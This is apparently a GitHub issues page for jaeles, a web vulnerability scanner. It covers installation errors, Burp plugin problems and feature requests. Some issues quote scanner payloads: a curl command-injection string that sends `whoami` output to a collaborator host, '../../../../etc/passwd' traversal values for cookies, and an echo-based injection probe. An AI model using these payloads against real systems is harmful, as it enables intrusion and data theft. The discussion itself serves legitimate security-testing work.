jaeles's People

Contributors

cfsdes, dinhbaouit, halencarjunior, iamstoxe, j3ssie, monkeywithacupcake, nannal, nishantbhagat57, noraj

jaeles's Issues

Issue in install

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

What should I do?

Burp plugin Ping error

Command used :
(1) jaeles server --verbose
(2) The JWT Token has been saved in ~/.jaeles-burp/config.json.
(3) Login UI with the creds.

Procedure to produce :
When pressing the "Test Connection" button in Burp Suite Community Edition, the jaeles server produced a "401" error. Meanwhile, "Send to Endpoint" does not work either.

[BUG] Parameter value of signature gets not replaced by -p switch

Thank you for this awesome project at first!

I recently used Jaeles with the burp plugin, so I started Jaeles in server mode.
Unfortunately, I have noticed that when supplying an additional value of a parameter defined in a signature, it won't be replaced by the Jaeles API.

For example, my parameter in the signature looks as follows:

variables:
  - dest: |
        example.com

I call Jaeles like :

jaeles server -v -s "my-signature.yaml" -p 'dest=xxx.burpcollaborator.net' --proxy http://127.0.0.1:8080

Following test payload is in the signature:

payloads:
  - '\"curl http://{{.dest}}/.testing/?vuln=16?user=\\\`whoami\\\`\"'

But when observing the requests Jaeles makes through burp, I see that the parameter value of "dest" is not replaced with "xxx.burpcollaborator.net".
It still sets the value as initially defined:

...http://example.com/.testing/?vuln=16?user=...

Saving details in txt

First of all, I ❤❤❤ your tools man.

When generating output in html it would be nice to view the file in the browser other than it downloading since it has no file extension.

Header Generator Error

When I try to use Generator with some headers, the payload doesn't work. For example:

# info to search robots.txt
id: test
type: fuzz
info:
  name: Robots
  risk: Low


payloads:
  - 'robots.txt'
  - 'teste'
    

requests:
  - generators:
      - Header("{{.payload}}", "Arbitraty")

When I use this template, the jaeles will send 2 requests using the header "Arbitraty" but with the same payload, which is the last payload that I set (in this case: teste)

However, if I change the Arbitraty word for Referer, it will work normally. This problem doesn't occur only with some headers.

Scanning WebApp with Auth

Hello, I would like to ask, how to scan a web app that requires login/authentication?
BTW, it's a Laravel 8/9 web app.
Thank you.

No signature loaded

Trying to execute the CLI:

$ jaeles scan -u https://localhost:8080

[Error] No signature loaded

Prior to execution, jaeles config -a init and -a update were run to ensure signatures were available.

Is there something else to do?

Thanks!

scanning type:list Will repeat

Hello, scanning the same host name will repeat the scan, hoping to have a logo, otherwise it will be rescanned every time.

go get fails for github.com/appleboy/gin-jwt

Hi. When compiling the latest version of the code, I get the following error:

# github.com/appleboy/gin-jwt
src/github.com/appleboy/gin-jwt/auth_jwt.go:457:14: not enough arguments in call to c.SetCookie
        have (string, string, int, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:475:14: not enough arguments in call to c.SetCookie
        have (string, string, number, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:540:14: not enough arguments in call to c.SetCookie
        have (string, string, int, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)

It seems related to this issue in the gin-jwt project: appleboy/gin-jwt#230. Some users have solved the issue by implementing go modules.

Regards.

Runtime error on using --no-db flag

Command:
./jaeles scan -s templates/ -u http://testphp.vulnweb.com/listproducts.php?cat=2 -c 50 --no-db

Error (if using --no-db):

Jaeles beta v0.14 by @j3ssiejjj
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xb0 pc=0xc4a966]

goroutine 1 [running]:
github.com/jinzhu/gorm.(*DB).clone(0x0, 0x4ebfa4)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:853 +0x26
github.com/jinzhu/gorm.(*DB).NewScope(0x0, 0x111fb20, 0xc00012c000, 0xc0004182d0)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:204 +0x2f
github.com/jinzhu/gorm.(*DB).Create(0x0, 0x111fb20, 0xc00012c000, 0x1)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:482 +0x43
github.com/jaeles-project/jaeles/database.NewScan(0xc0004cc7e0, 0x12, 0x13435a3, 0x1a, 0xc0004ccac0, 0x1b, 0xc0004ccae0, 0x1c, 0xc0004ccb00, 0x1d, ...)
	/go/src/github.com/jaeles-project/jaeles/database/scan.go:37 +0x33e
github.com/jaeles-project/jaeles/cmd.SelectSign()
	/go/src/github.com/jaeles-project/jaeles/cmd/root.go:198 +0x46a
github.com/jaeles-project/jaeles/cmd.runScan(0xc000470580, 0xc0004040e0, 0x0, 0x7, 0x0, 0x0)
	/go/src/github.com/jaeles-project/jaeles/cmd/scan.go:36 +0x42
github.com/spf13/cobra.(*Command).execute(0xc000470580, 0xc000404070, 0x7, 0x7, 0xc000470580, 0xc000404070)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:842 +0x460
github.com/spf13/cobra.(*Command).ExecuteC(0x1fbff40, 0x44813a, 0x1fd5680, 0xc000000180)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:950 +0x349
github.com/spf13/cobra.(*Command).Execute(...)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:887
github.com/jaeles-project/jaeles/cmd.Execute()
	/go/src/github.com/jaeles-project/jaeles/cmd/root.go:33 +0x31
main.main()
	/go/src/github.com/jaeles-project/jaeles/main.go:6 +0x20

sqlite3-binding.c

I'm getting installation error
root@wind:~# go install github.com/jaeles-project/jaeles@latest

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

There Is One Feature Is Missing ^.^

Actually This Tool Is So Great , But In type: fuzz There Is One Feature Missing
It Is Fuzz Cookie Header , This Tool Give Us To Replace Value Of Header Name But Let e.g.
Cookie Header Of The Origin Request Like This
Cookie: session=1; id=22; lang=en
So It Is Possible To Fuzz Cookie Here Like Fuzzing Body e.g. Can You Add Something Like That

id: Cookie-Fuzz
info:
  name: Fuzz Cookie Headers
  risk: Critical
type: fuzz
payloads:
  - '../../../../etc/passwd'
requests:
  - generators:
       - Header-Fuzz("{{.payload}}", "Cookie")

So Here Header-Fuzz Generate Three Requests
Cookie: session=../../../../etc/passwd; id=22; lang=en
Cookie: session=1; id=../../../../etc/passwd; lang=en
Cookie: session=1; id=22; lang=../../../../etc/passwd
So Can This Happen ?
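
The per-cookie mutation requested in the issue above, as an added Go illustration; it is not part of the issue and not jaeles code. `FuzzCookie` is a hypothetical helper, and `Header-Fuzz` is the requester's proposed name, not an existing jaeles generator. The sample header and payload are the ones quoted in the issue.

```go
package main

import (
	"fmt"
	"strings"
)

// FuzzCookie (hypothetical helper) returns one Cookie header value per
// name=value pair in original, with only that pair's value replaced by
// payload. Segments without "=" are kept verbatim and never fuzzed.
func FuzzCookie(original, payload string) []string {
	type pair struct {
		name, value string
		bare        bool // segment had no "=", e.g. a lone flag
	}
	var pairs []pair
	for _, seg := range strings.Split(original, ";") {
		seg = strings.TrimSpace(seg)
		if seg == "" {
			continue // tolerate trailing or doubled ";"
		}
		// Cut at the first "=" only, so values that contain "="
		// (base64 padding, nested k=v) stay intact.
		name, value, found := strings.Cut(seg, "=")
		pairs = append(pairs, pair{name, value, !found})
	}

	var out []string
	for i := range pairs {
		if pairs[i].bare {
			continue
		}
		parts := make([]string, len(pairs))
		for j, p := range pairs {
			switch {
			case p.bare:
				parts[j] = p.name
			case j == i:
				parts[j] = p.name + "=" + payload
			default:
				parts[j] = p.name + "=" + p.value
			}
		}
		out = append(out, strings.Join(parts, "; "))
	}
	return out
}

func main() {
	// Header and payload taken from the issue text.
	for _, c := range FuzzCookie("session=1; id=22; lang=en", "../../../../etc/passwd") {
		fmt.Println("Cookie: " + c)
	}
}
```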

Can I create workflow with jaeles?

Jaeles has a lot of features, but one feature is missing: connecting many templates, like nuclei. I use nuclei only for that feature. But I'd really love it if jaeles had that same feature too.

# github.com/mattn/go-sqlite3 sqlite3-binding.c: In function ‘sqlite3SelectNew’: sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr] 129019 | return pNew; | ^~~~ sqlite3-binding.c:128979:10: note: declared here 128979 | Select standin; | ^~~~~~~

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

CPU spikes to 100 % and no internet connection in my home router

I use jaeles with the following command:
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2 --proxy http://127.0.0.1:8080
IMMEDIATELY CPU SPIKES TO 100% after this and my pc fan runs like a helicopter
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2
It also causes the CPU to spike to 100% later on and keeps it at no less than 50% while the scan is running. Furthermore, there was no longer any internet connection on my home router. To have the connection again I have to end the jaeles process and restart my router.
First problem I need help if possible.
For the connection problem, it would be solved if there were an option to add a resolvers file with a flag like -r resolvers.txt, as well as a rate limit, hopefully. jaeles is a very nice tool and always thanks for providing it.

add a progress bar

Add an -pbar option similar to nuclei to show the total number of packets being sent

Is "Body" works as intended?

As we can see in the docs:

Header() and Body() have same usage of Query() generator.

- Query("{{.payload}}", "{{.name}}") works fine, but
- Body("{{.payload}}", "{{.name}}") just ignored.
I tried to set the method to POST, but anyways it doesn't work
My config is -

id: ci-fuzz-01
info:
  name: Command Injection Reflection
  risk: High
payloads:
- 'echo TJEGSE$((2314+6548321))$(echo TJEGSE)TJEGSE' 
requests:
- detections:
  - StringSearch("response", "6550635") && (StringCount("response", "6550635") > StringCount("oresponse",
    "6550635"))
  generators:
  - Body("{{.payload}}", "{{.name}}")
type: fuzz
variables:
- name: 'cmd

'

Unable to install burp plugin

Hi ,

I tried installing via the burp plugin and I am getting this error. The server is running, but when I send a request via burp to scan in the jaeles server endpoint, this is the error shown. Please advise at the earliest.

Screen Shot 2022-10-23 at 23 45 20
Screen Shot 2022-10-23 at 23 46 40
Screen Shot 2022-10-23 at 23 47 17

[Request] Adding password bruteforce and directory fuzzing option

Send the request from burp to Jaeles. And use jaeles to brute force password or fuzz directories.

Why we need to do that?

  1. Since jaeles is written in go, it will be faster
  2. Burp intruder can't manage large files such as rockyou.txt for brute forcing; burp will crash. (In my vm :( . don't know about other systems)

Installation advice

Hey Guys,

Been playing with jaeles for a few days now and this is what I did to get it to work:

  1. download one of the pre-compiled binaries, they worked straight away for me. Add it to your path and you're good to go. If you need to install it use the GO111MODULE=on go install github.com/jaeles-project/jaeles@latest, the binary is inside the go folder. I have not tested this so unsure how it works.
  2. When using your own signatures, use the full path
  3. if for whatever reason when you do the jaeles config init you get an error, delete the folder .jaeles and try again, you should see the signatures being downloaded
  4. when sending request from burp, make sure you edit it on responder before sending it. I would also advise to test the signatures on your test server before doing any scans to an operational server.

Otherwise, the tool seems to work like charm. I hope this helps.

Signatures still not loaded

Apologies for opening a new issue, but the previous one #12 was closed before I had a chance to test the changes.

After pulling the new Jaeles and running a config -a update, still says "No signatures loaded".

Is there a specific directory or environment in which Jaeles should be run? For some reason it's not locating signatures when running a simple scan command.

Jaeles Server without burp Using

Step 1 install jaeles

wget https://github.com/jaeles-project/jaeles/releases/download/beta-v0.17/jaeles-v0.17-darwin.zip
unzip jaeles-v0.17-darwin.zip

Step 2 reload signatures

git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures ./jaeles-signatures/
./jaeles config -a reload --signDir ./jaeles-signatures/

Step 3. start server

./jaeles server

Step 4 jwt token

POST /auth/login HTTP/1.1
Content-Type: application/json
User-Agent: Jaeles Scanner
Host: 127.0.0.1:5000
Content-Length: 54
Connection: close

{
    "username": "jaeles",
    "password": "your_password_here"
}

Step 5 install Burp plugin

https://github.com/jaeles-project/jaeles-plugins

refer. https://jaeles-project.github.io/installation/burp-integration/

can I use burp collaborator for blind injections?

Hi,
Jaeles is a most powerful tool, I love it. But can I use burp collaborator in a script, like the BurpBounty Burp plugin does? Is there any way I can give {BC} and have it replaced by the burp collaborator address?

Not able to install. not able to use custom template if using docker.

I am installing jaeles in VPS and facing error when installing using GO. I run go install github.com/jaeles-project/jaeles@latest
and getting following error after some installation.

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

is anyone having issues with the installation?

I tried:

go install github.com/jaeles-project/jaeles@latest

and it failed with error:

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 |   return pNew;
       |          ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 |   Select standin;
       |          ^~~~~~~

then I tried:

GO111MODULE=on go install github.com/jaeles-project/jaeles@latest

and I got the same error.

I tried the docker image but it is not working; I tried to get a shell into it to try to fix the docker image but bin/bash is not present. Does anyone know how to successfully install Jaeles? Am I missing something?

the only ones that are working are the pre-compiled versions.

Is there any rate limiting option?

Hi

I'm finding only "info" level vulns, probably due to the lack of a rate-limiting feature to throttle the number of requests per second. Is there an option to do this that I may not have perceived yet?

Regards

Repeat not working

The repeat option on yaml template is not working. I tried to repeat the request and no success

Suspected bug when running basic scan

After the basic signature is scanned, jaeles does not stop running or print the vulnerability results of the scan, but keeps sending just four packets (HEAD, POST, GET, PATCH); the requested URL is the same, just like DDOS.
I have executed reload --signDir jaeles-signatures, the command used when scanning is
./jaeles-v0.9 scan -u https://seaii-blog.com -v.
My operating system is osx.

Go get is deprecated

Attached is a screenshot of an error that occurred while installing Jaeles through the go command.

GO111MODULE=on go get github.com/jaeles-project/jaeles

Snap_Shot_02866

Origin detection not work

test rule:

id: test
info:
  name: Test 
  risk: Critical
type: fuzz

payloads:
    - 'test'

requests:
  - generators:
      - Query("[[.original]]{{.payload}}")
    detections:
      - OriginResponseTime() > 0

jaeles scan -s test.yaml -u https://example.com\?param\=1 -v --debug
Jaeles beta v0.7 by @j3ssiejjj
[0000]  INFO Load config from: /root/.jaeles/config.yaml
[0000]  INFO Summary output: out/jaeles-summary.txt
[0000]  INFO Signatures Loaded: 1
[0000]  INFO Signature Loaded: test.yaml
[0000]  INFO Start Scan with ID: 61343531626561382d376436302d313165612d613733392d393630303030313263303833
[0000]  INFO Input Loaded: 1
[0000] DEBUG Checking backround task
[0000] DEBUG Generator: Query("[[.original]]test")
[0000] DEBUG injectedString: [[.original]]test
[0000] DEBUG paramName: undefined
[0000] DEBUG New Parsed Reuqest: 1
[Sent] GET https://example.com?param=1test 200 OK HTTP/1.1 0.42473274
[0000] DEBUG Detection: OriginResponseTime() > 0

Missing ability to modify original parameter name

Hello,

I might have missed something but it looks like we can't modify the original parameters names by using generators.

For example: What I would like to automate:
hxxps://test.com/index.php?test1=aaa&test2=aaaa -> hxxps://test.com/index.php?test1[]=aaa&test2[]=aaaa

Did I miss something, or would this be an awesome functionality to add? 😁

Regards,

Inventory notification

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that Rawsec's CyberSecurity Inventory, but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example: Twitter URL

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

Jaeles in WebServer?

Hello, is it possible to mount the web UI and the rest on a web server and pass the burpsuite traffic from my machine?
